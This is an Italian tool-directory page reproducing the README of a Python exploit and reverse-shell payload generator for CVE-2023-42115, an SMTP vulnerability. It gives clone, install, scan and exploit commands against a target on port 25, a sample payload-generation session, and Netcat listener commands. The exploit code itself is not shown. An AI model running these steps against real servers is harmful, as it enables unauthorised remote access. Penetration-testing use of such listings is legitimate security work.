Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
cve-2023-42115 — Generatore di exploit e payload reverse shell basato su Python per CVE-2023-42115, con modalità di scansione ed exploit e creazione di payload multipiattaforma. | Kitploit
Strumenti/GitHubGitHub/kirinse/cve-2023-42115
Generazione di PayloadAnalisi delle VulnerabilitàExploitShellcodePenetration TestingSviluppo Payload
GitHubkirinse/cve-2023-42115

cve-2023-42115

Generatore di exploit e payload reverse shell basato su Python per CVE-2023-42115, con modalità di scansione ed exploit e creazione di payload multipiattaforma.

Vedi Repository
9482 anni faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2023-42115: Script di Exploit e Generatore di Payload

Questo repository contiene due script Python:

  1. exploit.py: Uno script per sfruttare la vulnerabilità CVE-2023-42115.
  2. generate_payload.py: Uno script per generare payload di reverse shell.

Prerequisiti

Prima di eseguire gli script, assicurati di avere Python 3 installato sul tuo sistema.

Installazione

  1. Clona il Repository:
    root@kitploit:~
    git clone https://github.com/isotaka134/cve-2023-42115.git
    cd cve-2023-42115
    
    
  2. Installa le Dipendenze:

Installa le librerie Python richieste usando pip. Esegui il seguente comando per installare tutte le dipendenze necessarie elencate in requirements.txt:

root@kitploit:~
pip install -r requirements.txt

Utilizzo

exploit.py

Questo script sfrutta la vulnerabilità CVE-2023-42115.

root@kitploit:~
python exploit.py -t <target_ip> -p <target_port> [options]

Opzioni:

-t: L'indirizzo IP del target.

-p: La porta del servizio target.

Esempio:

  1. Scansiona il Target
    root@kitploit:~
    python exploit.py -t 192.168.1.10 -p 25  --mode SCAN
    
  2. Sfrutta la vulnerabilità
    root@kitploit:~
    python exploit.py -t 192.168.1.10 -p 25 --mode EXPLOIT -f /path/to/payload.sh
    

generate_payload.py

Questo script genera un payload di reverse shell in base all'input dell'utente.

root@kitploit:~
 python generate_payload.py

Passaggi:

Lo script ti chiederà le seguenti informazioni:

A. Tipo di payload ( linux o windows)

B. IP locale: indirizzo per la connessione inversa

C. Porta locale: per la connessione inversa ** I: Se sei dietro un router o stai usando NAT, assicurati di impostare il corretto inoltro delle porte verso il dispositivo su cui è in esecuzione Netcat.**

D. Nome del file di output (ad es., payload.sh per Linux o payload.ps1 per Windows)

Esempio:

root@kitploit:~
python generate_payload.py
Payload Generator
Enter payload type (linux/windows): Linux 
Enter local IP address: 127.0.0.1
Enter local port: 4444
Enter output file name (e.g., payload.sh or payload.ps1): Payload.sh
Payload saved to Payload.sh

Configura un Listener

Devi configurare un listener sulla tua macchina locale per ricevere la reverse shell. Puoi usare Netcat (nc) per questo scopo.

  1. Per Linux: Apri un terminale e avvia un listener Netcat:
root@kitploit:~
  nc -lvnp <YOUR_LOCAL_PORT>
  1. Per Windows: Apri un Prompt dei comandi e avvia un listener Netcat:
root@kitploit:~
  nc -lvnp <YOUR_LOCAL_PORT>

Seguendo questi passaggi, dovresti essere in grado di creare e utilizzare un payload per sfruttare CVE-2023-42115 e ricevere una connessione di reverse shell.

Contributi

Se hai suggerimenti per miglioramenti o vuoi contribuire, apri una issue o invia una pull request.

Dichiarazione di non responsabilità

  1. Disclaimer Legale: Questo script è pensato per scopi educativi e test etici. L'uso non autorizzato contro sistemi di cui non possiedi la proprietà o per i quali non hai il permesso esplicito di test è illegale e punibile per legge.
  2. Uso Etico: Utilizza questo script in modo responsabile e solo in ambienti dove puoi eseguire test di sicurezza.

Risoluzione dei problemi

  1. Problemi di connessione: Verifica che il target sia raggiungibile e che il servizio SMTP sia in esecuzione
  2. Rilevamento della vulnerabilità: Assicurati che il banner del servizio corrisponda all'output previsto per il controllo della vulnerabilità.
  3. Esecuzione del payload: Assicurati che il file del payload sia formattato correttamente e accessibile.

Contatti

Per domande o supporto, contatta

root@kitploit:~
 [email protected]
Scarica lo strumento